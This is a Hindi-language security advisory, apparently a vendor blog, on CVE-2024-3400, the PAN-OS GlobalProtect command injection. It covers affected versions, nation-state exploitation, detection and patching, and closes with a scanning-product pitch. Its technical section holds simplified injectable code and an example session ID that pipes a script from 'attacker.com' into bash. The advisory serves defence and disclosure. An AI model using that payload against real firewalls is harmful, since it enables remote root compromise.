CVE-2024-3400: Palo Alto PAN-OS कमांड इंजेक्शन — CVSS 10.0
CVE-2024-3400 Palo Alto Networks PAN-OS GlobalProtect गेटवे में एक अधिकतम-गंभीरता वाली OS कमांड इंजेक्शन भेद्यता है। एक अनऑथेंटिकेटेड हमलावर बिना किसी इंटरैक्शन के root के रूप में मनमाने OS कमांड निष्पादित कर सकता है। खुलासे से पहले UTA0218 (संभवतः स्टेट-प्रायोजित) द्वारा इसका शोषण किया गया।
| विशेषता | मान |
|---|---|
| CVE ID | CVE-2024-3400 |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-77: OS कमांड इंजेक्शन |
| प्रकाशित | 12 अप्रैल 2024 |
| शोषण | सक्रिय — CISA KEV, नेशन-स्टेट शोषण |
CVE-2024-3400 क्या है?
CVE-2024-3400 Palo Alto Networks PAN-OS की GlobalProtect सुविधा को प्रभावित करता है। जब GlobalProtect को गेटवे या पोर्टल के रूप में कॉन्फ़िगर किया जाता है, तो एक अनऑथेंटिकेटेड रिमोट हमलावर फ़ायरवॉल एप्लायंस पर root विशेषाधिकार के साथ निष्पादित होने वाले मनमाने OS कमांड इंजेक्ट कर सकता है।
कारकों का यह संयोजन — कोई ऑथेंटिकेशन ज़रूरी नहीं, नेटवर्क से एक्सेस योग्य, बदला हुआ स्कोप, कॉन्फ़िडेंशियलिटी, इंटीग्रिटी, और अवेलेबिलिटी पर अधिकतम प्रभाव — एक पूर्ण CVSS 10.0 स्कोर देता है। फ़ायरवॉल वेंडरों में, अब तक बहुत कम भेद्यताओं को यह स्कोर मिला है।
🚨 पैच उपलब्ध होने से पहले नेशन-स्टेट शोषण
Volexity ने इस भेद्यता को एक इंसिडेंट का जवाब देते समय खोजा, जहाँ UTA0218, एक परिष्कृत थ्रेट-एक्टर, ने भंग किए गए PAN-OS डिवाइसों पर UPSTYLE नाम का एक नया Python बैकडोर डिप्लॉय किया था। हमलावर ने फ़ायरवॉल का उपयोग इंटरनल नेटवर्क तक पहुँचने, Active Directory क्रेडेंशियल्स चुराने, और संवेदनशील डेटा एक्सफ़िल्ट्रेट करने के लिए एक पिवट-पॉइंट के रूप में किया। Volexity का अनुमान है कि शोषण मार्च 2024 के अंत में शुरू हुआ — Palo Alto को सूचित किए जाने से हफ़्तों पहले।
प्रभावित सिस्टम
| PAN-OS वर्ज़न | प्रभावित (GlobalProtect सक्षम) | फ़िक्स्ड वर्ज़न |
|---|---|---|
| PAN-OS 11.1 | < 11.1.2-h3 | 11.1.2-h3+ |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1+ |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1+ |
| PAN-OS 10.1 | < 10.1.14-h4 | 10.1.14-h4+ |
पूर्व-शर्त: GlobalProtect गेटवे या पोर्टल कॉन्फ़िगर होना चाहिए (show global-protect-gateway current-user नतीजे लौटाता है)। जिन संगठनों ने GlobalProtect कॉन्फ़िगर नहीं किया है, वे प्रभावित नहीं हैं।
तकनीकी विश्लेषण
इंजेक्शन पॉइंट GlobalProtect सेशन-हैंडलिंग कोड में है। जब कोई GlobalProtect सेशन स्थापित होता है, तो कुछ सेशन विशेषताएँ फ़ायरवॉल पर टेम्पररी फ़ाइलों में लिखी जाती हैं। इन सेशन फ़ाइलों के लिए फ़ाइल-पाथ बनाने वाला कोड सेशन आइडेंटिफ़ायर को ठीक से सैनिटाइज़ नहीं करता, जो आंशिक रूप से हमलावर-नियंत्रित होता है।
# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"] # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}") # Command injection here
# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"
UTA0218 द्वारा इंस्टॉल किया गया UPSTYLE बैकडोर एक नई पर्सिस्टेंस तकनीक का उपयोग करता था: एक Python स्क्रिप्ट जो वेब-सर्वर एक्सेस लॉग को विशिष्ट रिक्वेस्ट पैटर्न (जिसमें एक एन्क्रिप्टेड कमांड होता था) के लिए मॉनिटर करती थी, कमांड निष्पादित करती थी, और फिर गतिविधि के सबूत हटाने के लिए मूल फ़ाइल-सामग्री को बहाल कर देती थी।
पोस्ट-एक्सप्लॉइटेशन गतिविधि (UTA0218)
Volexity ने नेशन-स्टेट एक्टर की निम्नलिखित पोस्ट-एक्सप्लॉइटेशन क्रम को दस्तावेज़ किया:
- UPSTYLE डिप्लॉयमेंट: स्थायी एक्सेस के लिए फ़ायरवॉल के वेब-सर्वर पाथ में इंस्टॉल किया गया Python बैकडोर
- क्रेडेंशियल एक्सट्रैक्शन: VPN क्रेडेंशियल्स और इंटरनल राउटिंग जानकारी वाला फ़ायरवॉल कॉन्फ़िगरेशन डंप
- इंटरनल पिवटिंग: इंटरनल होस्ट तक पहुँचने के लिए भंग किए गए फ़ायरवॉल की भरोसेमंद नेटवर्क स्थिति का उपयोग
- LDAP क्वेरी: फ़ायरवॉल के इंटरनल नेटवर्क एक्सेस के ज़रिए Active Directory एनुमरेशन
- डेटा स्टेजिंग: फ़ायरवॉल के ज़रिए संवेदनशील फ़ाइलों का कंप्रेशन और एक्सफ़िल्ट्रेशन
पहचान
PAN-OS लॉग विश्लेषण
# Check for UPSTYLE backdoor artifacts find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null # Suspicious traffic in GlobalProtect logs grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log # Modified system files (UPSTYLE modifies then restores) # Check for recent access times on web server files find /var/appweb -atime -7 -name "*.php" -o -name "*.py"
थ्रेट-हंटिंग क्वेरी
- असामान्य सेशन-कुकी फ़ॉर्मैट के साथ GlobalProtect पाथ पर HTTP 200 रिस्पॉन्स
- फ़ायरवॉल मैनेजमेंट प्लेन से बाहरी IP को आउटबाउंड कनेक्शन
- PAN-OS से थ्रेट-इंटेलिजेंस फ़ीड में मौजूद न होने वाले डोमेन के लिए DNS क्वेरी
- फ़ायरवॉल कॉन्फ़िगरेशन फ़ाइलों पर असामान्य फ़ाइल-संशोधन टाइमस्टैंप
सुधार
- तुरंत पैच करें: ऊपर सूचीबद्ध हॉटफ़िक्स वर्ज़न लागू करें। यह सक्रिय शोषण वाला CVSS 10.0 है — कोई स्वीकार्य देरी नहीं है।
- Threat Prevention अंतरिम वर्कअराउंड: अनपैच्ड डिवाइस के लिए, GlobalProtect इंटरफ़ेस पर सुरक्षा-प्रोफ़ाइल के साथ Threat Prevention सक्षम करें। Palo Alto ने विशिष्ट थ्रेट-ID सिग्नेचर उपलब्ध कराए।
- अगर ज़रूरत न हो तो GlobalProtect अक्षम करें: जो संगठन सक्रिय रूप से GlobalProtect का उपयोग नहीं कर रहे, वे वर्कअराउंड के रूप में इस सुविधा को अस्थायी रूप से अक्षम कर सकते हैं।
- फ़ायरवॉल फ़ाइलों का ऑडिट करें: UPSTYLE और अन्य पोस्ट-एक्सप्लॉइटेशन आर्टिफ़ैक्ट की जाँच के लिए Palo Alto की उपलब्ध कराई गई स्क्रिप्ट चलाएँ।
- सभी क्रेडेंशियल्स रोटेट करें: फ़ायरवॉल कॉन्फ़िगरेशन में स्टोर किए गए किसी भी क्रेडेंशियल (VPN सर्टिफ़िकेट, LDAP बाइंड क्रेडेंशियल्स, आदि) को भंग माना जाना चाहिए।
💡 CISA आपातकालीन निर्देश: CISA ने Emergency Directive 24-03 जारी किया, जिसमें सभी US फ़ेडरल एजेंसियों को 19 अप्रैल 2024 तक पैच या सुधार लागू करने की माँग की गई। यह तात्कालिकता गंभीरता और परिष्कृत थ्रेट-एक्टरों द्वारा सक्रिय शोषण को दर्शाती है।
KENSAI पहचान क्षमता
- PAN-OS फ़िंगरप्रिंटिंग: KENSAI इंटरनेट-फ़ेसिंग Palo Alto डिवाइस और उनके PAN-OS वर्ज़न की पहचान करता है, CVE-2024-3400 के प्रति भेद्य कॉन्फ़िगरेशन को फ़्लैग करता है
- GlobalProtect एक्सपोज़र पहचान: पहचाने गए डिवाइस पर GlobalProtect गेटवे/पोर्टल सक्षम है या नहीं, इसकी पहचान करता है
- सुरक्षित शोषण पुष्टिकरण: एक गैर-विनाशकारी प्रोब कमांड निष्पादित किए बिना शोषण-योग्यता सत्यापित करता है
- कॉम्प्रोमाइज़ इंडिकेटर स्कैनिंग: एक्सेस योग्य वेब पाथ में UPSTYLE बैकडोर संकेतकों की जाँच करता है
- निरंतर अटैक-सतह मॉनिटरिंग: आपकी बाहरी अटैक-सतह में शामिल होने वाले नए खोजे गए PAN-OS डिवाइस पर अलर्ट देता है
क्या आपका Palo Alto इन्फ़्रास्ट्रक्चर CVE-2024-3400 के प्रति उजागर है?
KENSAI कमांड इंजेक्शन के प्रति भेद्य इंटरनेट-फ़ेसिंग PAN-OS डिवाइस की तुरंत पहचान करता है। थ्रेट-एक्टरों के पहले उन्हें खोजने का इंतज़ार न करें।
अभी अपनी परिधि स्कैन करें →